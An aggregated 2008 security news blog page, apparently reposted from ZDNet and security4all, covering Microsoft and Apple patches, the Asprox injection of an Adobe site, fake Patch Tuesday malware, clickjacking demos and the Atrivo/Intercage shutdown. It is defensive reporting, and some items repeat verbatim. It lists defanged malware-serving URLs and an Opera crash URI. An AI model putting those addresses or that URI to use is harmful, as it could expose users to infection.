Security Bloggers Meeting at RSA Europe 2008 (updated)



Kevin Riggins from Infosecramblings proposed a Security Bloggers/Twits meeting during the RSA Europe 2008 conference on Tuesday the 28th of October at 8 PM.

The location hasn't been set yet. If you are interested in joining us, drop a message with Kevin

UPDATE: It's final: Tuesday the 28th at 8:00 PM. The Novotel London Excel bar is the location. More info here.

Previous post:

(Photo under creative commons from ggee's photostream)

[Source:security4all]

Microsoft updates security advisory for local exploit for Windows Server



Microsoft updated Security Advisory (951306) last week. A vulnerability exists from last April that allowed local privilege escalation. The update to the advisory was made since there is now exploit code online. There is currently no patch available but a workaround is possible:

Microsoft is investigating new public reports of a vulnerability which could allow elevation of privilege from authenticated user to LocalSystem, affecting Windows XP Professional Service Pack 2, Windows XP Professional Service Pack 3, and all supported versions and editions of Windows Server 2003, Windows Vista, and Windows Server 2008. Customers who allow user-provided code to run in an authenticated context, such as within Internet Information Services (IIS) and SQL Server, should review this advisory. Hosting providers may be at increased risk from this elevation of privilege vulnerability.

Microsoft is aware that exploit code has been published on the Internet for the vulnerability addressed by this advisory. Our investigation of this exploit code has verified that it does not affect customers who have applied the workarounds listed below on their computers. Currently, Microsoft is not aware of active attacks that use this exploit code or of customer impact at this time. However, Microsoft is actively monitoring this situation to keep customers informed and to provide customer guidance as necessary. Upon completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through a service pack, our monthly security update release process, or an out-of-cycle security update, depending on customer needs

(Source: Microsoft Technet)

Secunia: popular security suites failing to block exploits

Secunia Comparative Review Internet Security SuitesIn a recently conducted comparative review, Danish security company Secunia, tested the detection rate of 12 different Internet Security Suites against 300 exploits (144 malicious files and 156 malicious web pages) affecting popular end user applications, to find that even the top performer in the test is in fact performing poorly in general. Their conclusion :

“These results clearly show that the major security vendors do not focus on vulnerabilities. Instead, they have a much more traditional approach, which leaves their customers exposed to new malware exploiting vulnerabilities.

While we did expect a fairly poor performance in this field, we were quite surprised to learn that this area is more or less completely ignored by most security vendors. Some of the vendors have taken other measures to try to combat this problem. One is Kaspersky who has implemented a feature very similar to the Secunia PSI, which can scan a computer for installed programs and notify the user about missing security updates. BitDefender also offers a similar system, albeit this is more limited in scope than the one offered by Kaspersky and Secunia. We do, however, still consider it to be the responsibility of the security vendors to be able to identify threats exploiting vulnerabilities, since this is the only way the end user can learn about where, when, and how they are attacked when surfing the Internet.”

And while it’s boring to scroll through the empty tables of the study, is Secunia’s report a frontal attack against the security software vendors’ inability to block exploits, or are they trying to emphasize on the fact that the end user should make better informed purchasing decisions when relying on All-in-One Security products?

In 2007, Secunia released data indicating that 28% of all installed apps are insecure, and despite that the vulnerabilities has been already addressed, the end users were still living in the reactive response world. Cybercriminals on the other hand, took notice, and following either common sense or publicly obtainable data indicating that end users remain susceptible to already patched vulnerabilities, started integrating outdated exploits into what’s to become one of the main growth factors for web malware in the face of today’s ubiqutous web malware exploitation kits.

Live Exploit Kit SampleA year later, another study confirmed this fact and pointed out that one of most effective vehicle for the success of web malware — the insecure web browser — remains largely ignored by millions of Google users. So, theoretically, the more traffic the malicious attackers acquire and redirect to their exploit serving domains, the higher the probability for a successful infection with an undetected by standard signatures based scanning piece of malware - which is exactly what they’ve been doing the entire 2007 and 2008.

What is more important, to detect the latest malware binary behind the exploit serving file, or prevent the latest malware binary from reaching the end user/company by blocking the relatively static exploit serving file? It’s all a matter of perspective.

Naturally, the reactions to the comparative review, and the methodology used are already receiving criticism from the vendors. Sunbelt Software’s Alex Eckelberry comments on the report, and also includes AV-Test.org’s Andreas Marx opinion emphasizing on why it’s important to prioritize :

“In most cases, it is simply not practical to scan all data files for possible exploits, as it would slow-down the scan speed dramatically. Instead of this, most companies focus on some widely used file-based exploits (like the ANI exploits) and some companies also remove the detection of such exploits after some time has passed by (as most users should have patched their systems in the meantime and in order to avoid more slow-downs). There are a lot more practical solutions built-in to security suites, like the URL filter (which checks and blocks known URLs which are hosting malware or phishing websites) and the exploit filter in the browser (which would also block access to many “bad” websites). Some tools also have virtualization and buffer/stack/heap overflow protection mechanisms included, too.

Then we have the traditional “scanner” — and even if some exploit code gets executed, a HIPS, IDS or personal firewall system might be able to block the attack. For example, some security suites are knowing that Word, Excel or WinAmp won’t write EXE files to disk — so potentially dropped malware cannot get executed and the system is left in a “good” state.”

Emphasizing on defense-in-depth, and prioritizing in the case of blocking the most popular exploits used is a very good point since it has the potential to protect as many customers as possible from the default set of exploits used in the majority of malware attacks. For instance, the massive SQL injections attacks that took place during the last couple of months, were all relying on relatively static javascript file, whose generic detection is a good example of prioritizing. Moreover, due to the evident template-ization of malware serving sites, and the commoditization of web malware exploitation kits, the impact of ensuring that your customers are protected from the default sets of exploits included within these kits, means that your customers will be protected from a huge percentage of web based malware attacks.

No Internet Security Suite can protect you from yourself, so do yourself and the Internet a favor - patch all your insecure applications - it’s free.

[Source: zdnet]

Adobe’s Serious Magic site SQL Injected by Asprox botnet

Adobe asprox malwareAccording to SophosLabs Adobe’s owned seriousmagic.com has been automatically SQL injected by the Asprox botnet, becoming the very latest high profile legitimate web sites injected with links to exploits and malware serving sites :

“The infection, which resides at hxxp://www.seriousmagic.com/help/tuts/tutorials.cfm?p=1, instructs users browsers to silently install a malicious file from a series of domains known to host attack sites. Adobe announced its acquisition of Serious Magic two years ago and whois records indicate the company is the owner of the seriousmagic.com domain.

According to this post from anti-virus provider Sophos, Adobe was notified of the infected page on Friday. The Register visited the link (using a virtual machine, of course) on Thursday and found it was still trying to redirect users to a series of nefarious sites including hxxp://abc.verynx.cn/ w.js and hxxp://1.verynx.cn/w.js. While those links no longer appeared to be active, two other sites used in the attack, hxxp://jjmaobuduo.3322.org/csrss/ w.js and hxxp://www2.s800qn.cn/csrss/ new.htm, were still active at time of writing.”

With the asprox botnet making an appearance at the sites of Redmond magazine, and Sony Playstation in May and June respectively, seriousmagic.com is once again among the several hundred sites injected with the same malicious domains. Let’s take a peek at this malware campaign, and see where it ends.

Adobe asprox malwareIn short, every tutorial entry is SQL injected with a malicious domain, which means that if there are 60 tutorial entries, the malicious javascript loads 60 times ending up in an endless loop of redirections to other malware and advertising revenue earning domains set up in this campaign. More specifically, the malicious w.js attempts to execute a multitude of already patched client-side exploits, using the following structure and ultimately leading to a copy of Worm.Win32.AutoRun.qtg with a high detection rate (29 AV scanners out of 36 detect it - 80.56%) :

www2.s800qn.cn /csrss/ new.htm
www2.s800qn.cn /csrss/ flash.htm
www2.s800qn.cn /csrss/ i1.htm
www2.s800qn.cn /csrss/ f2.htm
www2.s800qn.cn /csrss/ i1.html
www2.s800qn.cn /csrss/ flash112.htm
www2.s800qn.cn /csrss/ ff.htm
www2.s800qn.cn /csrss/ xl.htm
www2.s800qn.cn /csrss/ mi.htm
www2.s800qn.cn /csrss/ real10.htm
www2.s800qn.cn /csrss/ real11.htm
bbexe.com /csrss/ rondll32.exe

Despite Adobe’s delayed response and the fact that the domains are still active, they seem to have solved the issue by redirecting all traffic from the site to the clean adobe.com.

[Source: zdnet]

Adobe ships fix for clickjacking, clipboard hijack threats

Adobe ships fix for clickjacking, clipboard hijack threatsAdobe has released Flash Player 10 (Techmeme discussion) with a chock-full of major security improvements, including patches and mitigation for at least five serious security vulnerabilities.

The vulnerabilities covered with Flash Player 10 could allow an attacker to bypass the software’s security controls, Adobe warned.

From Adobe’s advisory:

  • Potential vulnerabilities have been identified in Adobe Flash Player 9.0.124.0 and earlier that could allow an attacker who successfully exploits these potential vulnerabilities to bypass Flash Player security controls. Adobe recommends users update to the most current version of Flash Player available for their platform. Due to the possibility that these security enhancements and changes may impact existing content, customers are advised to review this Adobe Developer Center article to determine if their content will be impacted, and to begin implementing necessary changes immediately to help ensure a seamless transition.

These include the previously covered clickjacking threat and clipboard hijack attacks.

A patch for Flash Player 9, which is vulnerable to these attack scenarios, is not yet available. Apple says that patch is currently scheduled for early November.

A second “critical” bulletin was also released for Flash CS3 Professional to cover a code execution vulnerability.

  • An attacker would need to convince a user to open a malicious SWF file to successfully exploit the issues. Adobe recommends that developers exercise caution when receiving unsolicited or suspicious SWF files. These issues do not affect Flash CS4 Professional. These issues do not affect the Mac version of Flash CS3 Professional.

* Image source: annia316’s Flickr photostream (Creative Commons 2.0)

[Source: zdnet]

Fake Microsoft Patch Tuesday malware campaign spreading

Fake Microsoft Update EmailMalicious attackers are once again taking advantage of event-based social engineering attacks, and are currently mass mailing fake notifications for Microsoft’s Patch Tuesday, attaching a copy of Trojan.Backdoor.Haxdoor, next to a legitimately looking PGP signature which is, of course, fake too :

“We received some questions from customers about an e-mail that’s circulating that claims to be a security e-mail from Microsoft. The e-mail comes with an attached executable, which it claims is the latest security update, and encourages the recipient to run the attached executable so they can be safe. While malicious e-mails posing as Microsoft security notifications with attached malware aren’t new (we’ve seen this problem for several years) this particular one is a bit different in that it claims to be signed by our own Steve Lipner and has what appears to be a PGP signature block attached to it. While those are clever attempts to increase the credibility of the mail, I can tell you categorically that this is not a legitimate e-mail: it is a piece of malicious spam and the attachment is malware. Specifically, it contains Backdoor:Win32/Haxdoor.”

Is timing everything when it comes to the success rate of such malware campaigns? Not necessarily.

Despite the touch points aiming to improve the trust factor, like mentioning a real Microsoft employee, spoofed FROM field as securityassurance AT microsoft.com, next to the PGP signature, given the fact that the emails aren’t personalized and that spam outbreaks spreading malware by capitalizing on Microsoft’s brand have cyclical pattern, namely, they re-appear every year (2005, 2007, 2008) the average end user is supposed to have a basic security awareness of this tactic. More info on the campaign :

Furthermore, this backdoor opens several TCP ports that allow remote attackers to connect to the comprmised PC and execute files, steal information from it, or upload and download files. The attachment’s file name varies, but uses the convention KBxxxxxx.exe, where xxxxxx is a random 6-digit number. Below are some of the file names we’ve seen, and are being used:

KB199250.exe
KB246586.exe
KB535548.exe
KB572906.exe
KB763412.exe

Compared to the recent targeted malware attack against U.S schools, and the massive fake CNN news items campaign taking advantage of client-side vulnerabilities, this one is definitely going to have a lower success rate - no matter the timing.

[Source: zdnet]

Lead, melamine, and backdoored routers

It seems that not a day goes by without a new media alert regarding bad things in the chinese supply chain. First it was lead in our toys, then it was melamine in our milk, and now it also may be backdoors in our counterfeit Cisco hardware.

A recent BusinessWeek article discusses a criminal prosecution from late 2007 that raised the possibility that counterfeit Cisco routers have made their way into the western supply chain. Purchasers apparently include several government agencies and contractors, including branches of the military.

While counterfeit products may be a major economic concern, they also present a vector for foreign concerns to inject backdoors into critical infrastructure. This scenario is rather unlikely, as it would be far more cost effective for an attacker to compromise desktop systems using social engineering and trojans than it would be to create a trojaned router. Nevertheless, the possibility pushed the FBI to launch Operation Cisco (Cylon?) Raider in an effort to clamp down on the sale of counterfeit routers.

Unlike toys and food, performing a in-depth analysis of what goes into these routers would be expensive and possibly imperfect. Much like the apocryphal story of the CIA-initiated Soviet oil pipeline sabotage, we may never know if these mongrel devices were either pure clones or something more sinister.

[Source: zdnet]

MS Patch Tuesday heads-up: 11 bulletins, 4 critical

11 bulletins, 4 criticalIt will be a very busy Patch Tuesday for administrators managing Microsoft Windows computer systems.

According to Microsoft’s advance notice mechanism, 11 security bulletins will drop next Tuesday (October 14, 2008), covering a wide range of serious vulnerabilities.

Four of the 11 bulletins are rated “critical,” meaning that those vulnerabilities can be exploited to launch remote, code execution attacks.


[ SEE: Microsoft makes daring vulnerability sharing move ]

The four “critical” bulletins apply to the widely deployed Internet Explorer browser, Active Directory, Microsoft Excel and Host Integration Server.

Six of the bulletins will be rated “important” and will provide fixes for a range of Microsoft Windows operating system vulnerabilities.

The final bulletin, rated “moderate,” will provide patches for an information disclosure bug in Microsoft Office.

This month will see the first appearance of the previously announced Exploitability Index, a new Microsoft initiative aimed at attempting predictions on whether exploit code will be released.

This index will attempt to predict if a vulnerability is likely to have functioning exploit code released, or have inconsistent exploit code released that wouldn’t work every time an attacker attempted to used it. We’ll even highlight vulnerabilities where we think it’s unlikely that functioning exploit code will ever be released.

Starting this month, Microsoft will also start sharing details on software vulnerabilities with security vendors ahead of Patch Tuesday under a new program aimed at reducing the window of exposure to hacker attacks.

The new Microsoft Active Protections Program (MAPP) will give anti-virus, intrusion prevention/detection and corporate network security vendors a headstart to add signatures and filters to protect against Microsoft software vulnerabilities.

* Image source: jeffwilcox’s Flickr photostream (Creative Commons 2.0)

[Source: zdnet]

Mac OS X Patch Day: 40 security flaws fixed

40 security flaws fixedApple has shipped another whopper of a patch to cover a total of 40 documented vulnerabilities affecting the Mac OS X ecosystem.

The Security Update 2008-007, available for Tiger and Leopard, covers a range of third-party components and Mac OS X flaws that could users at risk of remote code executions attacks.

The more serious vulnerabilities include:

  • Apache: CVE-2007-6420, CVE-2008-1678, CVE-2008-2364) Apache is updated to version 2.2.9 to address several vulnerabilities, the most serious of which may lead to cross site request forgery. Note: Apache version 2 is bundled with Mac OS X Server v10.4.x systems, but is not active by default.
  • ClamAV: (CVE-2008-1389, CVE-2008-3912, CVE-2008-3913, CVE-2008-3914) Multiple vulnerabilities exist in ClamAV 0.93.3, the most serious of which may lead to arbitrary code execution.
  • ColorSync CVE-2008-3642) A buffer overflow exists in the handling of images with an embedded ICC profile. Opening a maliciously crafted image with an embedded ICC profile may lead to an unexpected application termination or arbitrary code execution.
  • CUPS (CVE-2008-3641) A range checking issue exists in the Hewlett-Packard Graphics Language (HPGL) filter, which may cause arbitrary memory to be overwritten with controlled data. If Printer Sharing is enabled, a remote attacker may be able to cause arbitrary code execution with the privileges of the ‘lp’ user. If Printer Sharing is not enabled, a local user may be able to obtain elevated privileges.
  • libxslt (CVE-2008-1767) A heap buffer overflow issue exists in the libxslt library. Viewing a maliciously crafted HTML page may lead to an unexpected application termination or arbitrary code execution.
  • MySQL Server (CVE-2007-2691, CVE-2007-5969, CVE-2008-0226, CVE-2008-0227, CVE-2008-2079) MySQL is updated to version 5.0.67 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution.
  • PHP (CVE-2007-4850, CVE-2008-0674, CVE-2008-2371) PHP is updated to version 4.4.9 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution.
  • PSNormalizer (CVE-2008-3647) A buffer overflow exists in PSNormalizer’s handling of the bounding box comment in PostScript files. Viewing a maliciously crafted PostScript file may lead to an unexpected application termination or arbitrary code execution.
  • QuickLook (CVE-2008-4211) A signedness issue exists in QuickLook’s handling of
    columns in Microsoft Excel files may result in an out-of-bounds memory access. Downloading or viewing a maliciously crafted Microsoft Excel file may lead to an unexpected application termination or arbitrary code execution.
[Source: zdnet]

Opera bitten by ‘extremely severe’ browser bug

Extremely severe bug bites Opera browserBuried in the flurry of feature-related news surrounding the release of Opera 9.6 is the fact that the update fixes an “extremely severe” vulnerability that could expose Opera users to code execution attacks.

According to an Opera advisory, which is not mentioned anywhere in Opera’s giddy press release, there’s a patch out for an issue where specially crafted addresses could execute arbitrary code.

Here’s how Opera describes the vulnerability, which was discovered and reported by Matasano’s Chris Rohlf:

If a malicious page redirects Opera to a specially crafted address (URL), it can cause Opera to crash. Given sufficient address content, the crash could cause execution of code controlled by the attacking page.

Rohlf has more details on the Matasano Chargen blog:

In this case the vulnerability is based on a ’specially crafted URI’ which of course can be triggered by any attacker controlled content. It is reproducible on both x86 Linux and Win XP SP2 and Vista.

This flaw was found using some rudimentary fuzzing, simple stuff really. I basically whipped up a few lines of Javascript to create different URI’s with incrementing string lengths (yes I’m serious). And thanks to Immunity Debugger I was able to boil it down to a heap overflow in no time.

The offending URI was ‘http://BBB*BBB:password@example.com’. This took minimal effort to find and underscores the importance of simple fuzzing test cases being built into your SDLC.

The Opera 9.6 update also fixes a second security bug reported by ex-Zero Day blogger Nate McFeters.

Opera rates this bug as “highly severe” and warns that Java applets can be used to read sensitive information:

Once a Java applet has been cached, if a page can predict the cache path for that applet, it can load the applet from the cache, causing it to run in the context of the local machine. This allows it to read other cache files on the computer or perform other normally more restrictive actions. These files could contain sensitive information, which could then be sent to the attacker.

[Source: zdnet]

Asus ships Eee Box PCs with malware

Asus Eee BoxAsus has confirmed and apologized to customers (press release in Japanese; translated version) for shipping malware on the recently introduced Eee Box desktop computer :

“According to an email sent out by Asus, PC Advisor reports, the Eee Box’s 80GB hard drive has the recycled.exe virus files hidden in the drive’s D: partition. When the drive is opened, the virus activates and attempts to infect the C: drive and an removable drives connected to the system. According to Symantec, the malware is likely to be the W32/Usbalex worm, which creates an autorun.inf file to trigger recycled.exe from D:. Separately, we’ve been testing the Eee Box this week, and discovered our review unit came loaded with the W32/Taterf worm - aka W32.Gammima.AG, aka kavo.exe malware that sniffs out online gaming usernames and passwords.

Which models are known to carry the malware according to Asus?

Asus Eee BoxThe company has already managed to identify the following models with associated UPC codes :

Model number: EEEBOXB202-B; UPC code: 610839761807
Model number: EEEBOXB202-W; UPC code: 610839761814
Model number: EBXB202BLK/VW161D; UPC code: 610839530526
Model number: EBXB202WHT/VW161D-W; UPC code: 610839531202
Model number: EBXB202BLK/VK191T; UPC code: 610839547753

In addition to last month’s Asus fiasco when they accidentally shipped cracking tools and confidential documents on recovery DVDs, the company is among the increasing number of companies that have shipped malware on their products during the last couple of years - Apple (2006), TomTom (2007), Seagate (2007), and HP (2008).

[Source: zdnet]

Adobe posts workaround for clickjacking flaw, NoScript releases ClearClick

NoScript ClearClickFollowing the recent release of a PoC demonstrating clickjacking in action, Adobe has released a security advisory offering solutions for customers and IT administrators on dealing with the flaw until they releases a Flash player patch before the end of October.

“We have just posted a Security Advisory for Flash Player in response to recently published reports of a ‘Clickjacking’ issue in multiple web browsers that could allow an attacker to lure a web browser user into unknowingly clicking on a link or dialog. This potential ‘Clickjacking’ browser issue affects Adobe Flash Player’s microphone and camera access dialog. A Flash Player update to mitigate the issue will be available before the end of October. In the meantime, users can apply the workaround described in the Advisory.”

And since prevention is better than the cure — at least in the short term — the just released NoScript v1.8.2.1 aims to prove exactly the same with its ClearClick feature :

“The most specific and ambitious is called ClearClick: whenever you click or otherwise interact, through your mouse or your keyboard, with an embedded element which is partially obstructed, transparent or otherwise disguised, NoScript prevents the interaction from completing and reveals you the real thing in “clear”. At that point you can evaluate if the click target was actually the intended one, and decide if keeping it locked or unlock it for free interaction. This comes quite handy now that more dangerous usages of clickjacking are being disclosed, such as enabling your microphone or your webcam behind your back to spy you through the interwebs.”

Click in the clear, and make sure you’re not susceptible to exploitation through last quarter’s security vulnerabilities.

[Source: zdnet]

Atrivo/Intercage’s disconnection briefly disrupts spam levels

Atrivo Intercage BotnetsAfter years of operation, California based ISP Atrivo/Intercage, a well known Russian Business Network darling, faced the music and was disconnected from the Internet by its upstream provider at the end of September. What happened according to MessageLabs’s latest intelligence report, was a brief decline of spam due to the fact that the malware infected hosts couldn’t reach the ISP’s netblock. Logically, within the next couple of days Intercage’s customers quickly switched hosting locations of their botnet’s command and control servers, and cybercrime activity quickly got back to normal :

“Charged with providing a safe-haven for online scammers, cyber crooks and malware distributors, California-based ISP Intercage (aka Atrivo) was disconnected from the internet on September 20. Pacific Internet Exchange, Intercage’s upstream provider, terminated the service and after a few days, UnitedLayer, another service provider, agreed to host Intercage. But on September 25, after deciding Intercage still had too many on-going problems, UnitedLayer also terminated service.

It can be seen from the chart above that the botnet controllers are quick to respond to any degradation of their service, and can re-point their bots at a new command and control channel in a matter of days. Therefore MessageLabs expects this decline in spam to be short-lived, especially in anticipation of Halloween in October and Thanksgiving in the US in November, both of which are traditionally seasonal favorites for spammers.”

What’s particularly disturbing in Intercage’s case is not just the fact that it’s a U.S based ISP undermining the “lack of international cybercrime cooperation” excuse for not shutting it down earlier, but also, the fact that ATRIVO/Intercage’s uptime is a great example of how marginal thinking and relatively high average time it takes to shut them down, is nonetheless still keeping their business in the game. How come? For the past year, ATRIVO/Intercage has had 10 different Internet Service Providers, so controversially to the common wisdom that being on the run is supposed to make your job harder, it doesn’t really matters as the average time for ATRIVO to remain online seems to be above their customers’ averages :

“The following graph shows that Atrivo has had 10 different Internet providers over the past year. The number of Renesys peers selecting each provider is shown over time. Most providers didn’t stick around for long, but a few like WV Fiber (AS 19151) did hang in there for much of the year. For a couple of days recently, Atrivo had zero providers and were hence effectively out of business, but then United Layer (AS 23342) became their latest — and currently only — provider. We’ll see how long this lasts and if others step up to provide Atrivo with some redundancy. Of course, those who are convinced Atrivo is up to no good can simply block access to their IP addresses (prefixes) as they have a relatively modest allocation.”

Do bullet-proof cybercrime friendly providers have a future? Naturally, since it’s the simple market forces that are going to keep both fronts busy for years to come. With ATRIVO/Intercage now shut down, what’s next? Lessons learnt for the bad guys realizing that it’s about time they start taking advantage of basic OPSEC (operational security) processes like decentralizing their networks, and increasing the lifecycle of their customer’s cybercrime activities by taking advantage of fast-fluxing. The bottom line, despite that Intercage remains offline, but the concepts of cybercrime content hosting, and the Russian Business Network as a franchise, are always going to be there.

[Source: zdnet]

Zero day for Sun Solstice AdminSuite (sadmind)



A zero day disclosure is never a good thing but people need to be beware when it does. A vulnerability resides within a function of the Sun Solstice AdminSuite sadmind, which when properly exploited can lead to remote compromise of the vulnerable system. This information was posted to the Full Disclosure Mailinglist 2 days ago, together with an exploit for Metaploit.

I checked the Sun Security advisories but I couldn't find any information (yet). Disable the port or service if you don't need it or try to shield it if you do. Put an ACL in place. Keep an eye on upcoming advisories for workarounds and patches.

Related posts:

[Source: security4all]

Webcam hijack demo highlights clickjacking threat

Clickjacking demos highlight severity of cross-browser threat[ UPDATE: The details are out. Lots of unresolved clickjacking issues]

A security researcher in Israel has released a demo of a “clickjacking” attack, using an JavaScript game to turn every browser into a surveillance zombie.

The release of the demo follows last month’s partial disclosure of the cross-platform attack/threat, which affects all the major desktop platforms — Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash.

[ SEE: Clickjacking: Scary new cross-browser exploit]

In Guy Aharonovsky’s demo game, a Web page is set up to seamlessly hide another page in the background that’s actually managing the target’s Adobe Flash Player privacy settings manager.

Using a series of clicks bouncing around the rigged page, Aharonovsky is able to silently hijack the user’s clicks to modify the Flash privacy settings and take complete control of the installed webcam.

The wet dream of every private eye and peeping tom. Imagine this scenario, you play a short game on the web and by doing that you unknowingly grant someone full access to your webcam and microphone.

If you don’t want to try it or don’t have a webcam connected, you can see the attack in action in this YouTube video.

[ SEE: Firefox + NoScript vs Clickjacking ]

Aharonovsky’s harmless demo game is a perfect example of how clicks on one Web page can actually apply to clicks on page that’s invisible to the end user. The webcam hijack could have been used, for example, with live streaming sites like UStream or JustinTV to create a malicious surveillance platform, he explained.

The demo was done in the form of a JavaScript game but Aharonovsky warns that a Flash, Java, SilverLight, DHTML game or application can be used to achieve the same thing.

Some of the clicks are real game clicks other are jacked clicks. Every time the click is needed to be jacked the content simply move behind the iframe using z-index.

I had doubts about publishing this, but, if I could have understand it so are the bad guys, so it’s better to know about it.

Aviv Raff, a security researcher with expertise in browser hacking, has also built a proof-of-concept exploit using a hidden iFrame to hijack clicks to snag Twitter followers.

Raff’s demo invisibly overlays a blank page over the Twitter site and sets the”Click Me!” button on the spot where Twitter’s “Follow” icon is displayed. If the target is logged into Twitter, the click on Raff’s demo is actually executed on Twitter’s site.

The ramifications for this is truly scary and, as Google browser security guru Michal Zalewski explains, difficult to fix.

If you expand the idea behind these clickjacking demos, you can see how this can be exploited to make it easier to launch drive-by malware download using social engineering techniques.

Until the affected vendors can come up with adequate patches/mitigations, Web surfers might want to follow Jeremiah Grossman’s advice and move to Firefox + NoScript to get some level of security.

[Source: zdnet]

iPhone hits another security speedbump


iPhone hits another security speedbump

Apple’s ongoing struggles with poor security-related design choices have extended to the iPhone. According to security researcher Aviv Raff, everyone’s favorite mobile device is vulnerable to two separate security weaknesses that expose millions of users to phishing and spamming attacks.


[ SEE: Apple hasn’t learned from past security mistakes ]

Raff, a bug finder who regularly reports flaws in modern Web browsers, discovered that it’s easy to mask a link to a malicious phishing Web site because of the way the iPhone’s Mail application handles the display of links.

When the mail message is in HTML format, the text of links can be set to a different URL than the actual link. In most mail clients (e.g. on your PC / Mac), you can just hover the link and get a tooltip which will tell you the actual URL that you are about to click.

In iPhone it’s a bit different. You need to click the link for a few seconds in order to get the tooltip. Now, because the iPhone screen is small, long URLs are automatically cut off in the middle. So, instead of “hxxp://www.somedomain.com/verylongpath/verylongfilename”, you will get in the tooltip something like “www.somedomain.com/very…ilename”.

[ SEE: Apple patches 10 iPhone security holes ]

The problem here, Raff explains, is that an attacker can set a long subdomain (~24 characters) that, when cut off in the middle, will look as if it’s a trusted domain.

The spamming bug, described by Raff as “a pretty dumb design flaw,” allows the harvesting of “live” e-mail addresses simply by sending rigged images to targets checking e-mail on iPhones.

Whenever you view an HTML mail message which contains images, a request is made to a remote server in order to get the image. Most of the mail clients today requires you to approve the download of the images. This is done for a good reason.

If the images were downloaded automatically, the spammer who controls the remote server will know that you have read the message, and will mark your mail account as active, in order to send you more spam. This “feature” is also known as “Web Bug

The iPhone’s Mail application downloads all images automatically, and there is NO WAY to disable this feature!

[ SEE: Apple caught neglecting iPhone security ]

Raff said he provided details of these issues to Apple more than two month ago.

I’ve asked Apple several times for a schedule, but they have refused to provide the fix date. Three versions (v2.0.1, v2.02, v2.1) have been released since I provided them with the details, and they are still “working on it”. Therefore, I’ve decided to publicly disclose the technical details.

Separately, there’s an unpatched SMS privacy hole when the iPhone is placed in emergency call mode.

Apple is notoriously slow to fix iPhone flaws so if you’re nervous about these risks, you should be very careful when using Mail on the device.

[Source: zdnet]

Adobe posts workaround for clickjacking flaw, NoScript releases ClearClick

NoScript ClearClickFollowing the recent release of a PoC demonstrating clickjacking in action, Adobe has released a security advisory offering solutions for customers and IT administrators on dealing with the flaw until they releases a Flash player patch before the end of October.

“We have just posted a Security Advisory for Flash Player in response to recently published reports of a ‘Clickjacking’ issue in multiple web browsers that could allow an attacker to lure a web browser user into unknowingly clicking on a link or dialog. This potential ‘Clickjacking’ browser issue affects Adobe Flash Player’s microphone and camera access dialog. A Flash Player update to mitigate the issue will be available before the end of October. In the meantime, users can apply the workaround described in the Advisory.”

And since prevention is better than the cure — at least in the short term — the just released NoScript v1.8.2.1 aims to prove exactly the same with its ClearClick feature :

“The most specific and ambitious is called ClearClick: whenever you click or otherwise interact, through your mouse or your keyboard, with an embedded element which is partially obstructed, transparent or otherwise disguised, NoScript prevents the interaction from completing and reveals you the real thing in “clear”. At that point you can evaluate if the click target was actually the intended one, and decide if keeping it locked or unlock it for free interaction. This comes quite handy now that more dangerous usages of clickjacking are being disclosed, such as enabling your microphone or your webcam behind your back to spy you through the interwebs.”

Click in the clear, and make sure you’re not susceptible to exploitation through last quarter’s security vulnerabilities.

[Source: zdnet]

Student indicted for Palin e-mail hack

Student indicted for Palin e-mail hackThe U.S. Justice Department today announced that a federal grand jury in Knoxville, Tennessee has indicted the 20-year-old son of a state lawmaker in connection with the compromise of Sarah Palin’s Yahoo e-mail account.

David Kernell (left), who was identified for a while as the alleged hacker, is expected to be arraigned today before U.S. Magistrate Judge C. Clifford Shirley.

From the announcement:

The single count indictment, returned on Oct. 7, 2008, and unsealed today, alleges that on approximately Sept. 16, 2008, Kernell, a resident of Knoxville, obtained unauthorized access to Gov. Palin’s personal e-mail account by allegedly resetting the account password. According to the indictment, after answering a series of security questions that allowed him to reset the password and gain access to the e-mail account, Kernell allegedly read the contents of the account and made screenshots of the e-mail directory, e-mail content and other personal information. According to the indictment, Kernell posted screenshots of the e-mails and other personal information to a public Web site. Kernell also allegedly posted the new e-mail account password that he had created, thus providing access to the account by others.

[ SEE: Sarah Palin’s Yahoo account hijacked, e-mails posted online ]

Kernell faces a maximum of five years in prison, a $250,000 fine and a three-year term of supervised release.

* Photo credit: LA Times.

[Source: zdnet]

Atrivo/Intercage’s disconnection briefly disrupts spam levels

Atrivo Intercage BotnetsAfter years of operation, California based ISP Atrivo/Intercage, a well known Russian Business Network darling, faced the music and was disconnected from the Internet by its upstream provider at the end of September. What happened according to MessageLabs’s latest intelligence report, was a brief decline of spam due to the fact that the malware infected hosts couldn’t reach the ISP’s netblock. Logically, within the next couple of days Intercage’s customers quickly switched hosting locations of their botnet’s command and control servers, and cybercrime activity quickly got back to normal :

“Charged with providing a safe-haven for online scammers, cyber crooks and malware distributors, California-based ISP Intercage (aka Atrivo) was disconnected from the internet on September 20. Pacific Internet Exchange, Intercage’s upstream provider, terminated the service and after a few days, UnitedLayer, another service provider, agreed to host Intercage. But on September 25, after deciding Intercage still had too many on-going problems, UnitedLayer also terminated service.

It can be seen from the chart above that the botnet controllers are quick to respond to any degradation of their service, and can re-point their bots at a new command and control channel in a matter of days. Therefore MessageLabs expects this decline in spam to be short-lived, especially in anticipation of Halloween in October and Thanksgiving in the US in November, both of which are traditionally seasonal favorites for spammers.”

What’s particularly disturbing in Intercage’s case is not just the fact that it’s a U.S based ISP undermining the “lack of international cybercrime cooperation” excuse for not shutting it down earlier, but also, the fact that ATRIVO/Intercage’s uptime is a great example of how marginal thinking and relatively high average time it takes to shut them down, is nonetheless still keeping their business in the game. How come? For the past year, ATRIVO/Intercage has had 10 different Internet Service Providers, so controversially to the common wisdom that being on the run is supposed to make your job harder, it doesn’t really matters as the average time for ATRIVO to remain online seems to be above their customers’ averages :

“The following graph shows that Atrivo has had 10 different Internet providers over the past year. The number of Renesys peers selecting each provider is shown over time. Most providers didn’t stick around for long, but a few like WV Fiber (AS 19151) did hang in there for much of the year. For a couple of days recently, Atrivo had zero providers and were hence effectively out of business, but then United Layer (AS 23342) became their latest — and currently only — provider. We’ll see how long this lasts and if others step up to provide Atrivo with some redundancy. Of course, those who are convinced Atrivo is up to no good can simply block access to their IP addresses (prefixes) as they have a relatively modest allocation.”

